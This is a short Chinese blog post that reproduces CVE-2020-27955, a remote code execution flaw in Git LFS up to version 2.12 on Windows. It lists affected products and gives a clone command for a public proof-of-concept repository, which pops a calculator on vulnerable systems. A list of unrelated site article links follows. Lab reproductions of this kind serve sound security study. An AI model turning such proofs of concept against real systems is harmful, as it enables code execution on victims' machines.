Git-LFS 远程命令执行漏洞 CVE-2020-27955 漏洞复现

昵称还在想呢2024-04-09 10:10

今天遇到了一个比较有意思的洞,复现一下下..........

漏洞描述

Git LFS 是 Github 开发的一个 Git 的扩展,用于实现 Git 对大文件的支持

一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree等

该漏洞影响仅windows平台

漏洞影响

Git-LFS(git-lfs)<= 2.12

漏洞复现

克隆下面的仓库,如果版本在影响范围则会弹出计算器

复制代码 
clone https://github.com/r00t4dm/CVE-2020-27955

我们需下载git 与git-lfs

Git - Downloading Package

https://github.com/git-lfs/git-lfs/releases/tag/v2.12.0

安装之后执行

git-lfs.exe clone https://github.com/r00t4dm/CVE-2020-27955

相关推荐
没头脑的猪1 小时前
PowerShell精准管控RDP端口安全
安全
信创DevOps先锋1 小时前
2025年中国CI/CD市场格局:安全与智能并重的技术突围战
安全·ci/cd·gitee·开源
星晨雪海1 小时前
Idea中使用Git详细教程
git
xixixi777772 小时前
智算中心建设新范式:GPT-6/Rubin架构+1.6T光模块+量子安全网关+AI安全沙箱,算力·效率·安全·成本的最优平衡
人工智能·gpt·安全·机器学习·架构·大模型·通信
丶党玲儿2 小时前
AI-agent工程化(开源git分享)
人工智能·git·开源
上海云盾王帅2 小时前
跨境电商安全防护实战指南:守护店铺稳定与交易安全的生命线
安全
ZeroNews内网穿透2 小时前
ZeroNews安全网关接入企业微信自建应用
网络·数据库·安全·云计算
笑虾2 小时前
Git 学习笔记 - 合并
git
信创DevOps先锋2 小时前
Gitee CodePecker SCA:构筑企业数字化安全防线的智能卫士
安全·gitee
明月夜&2 小时前
Ubuntu 20.04 Docker 部署 Ollama + DeepSeek-Coder:本地 AI 编程助手实战
git·vscode·ubuntu·docker·大语言模型·智能体
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04GPT-6核心能力解析及与现有主流大模型对比05基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南06GPT-6发布日深度解析-Symphony架构200万Token实战07零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09从限购到畅通:GLM-5.1 Coding Plan接入攻略10CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南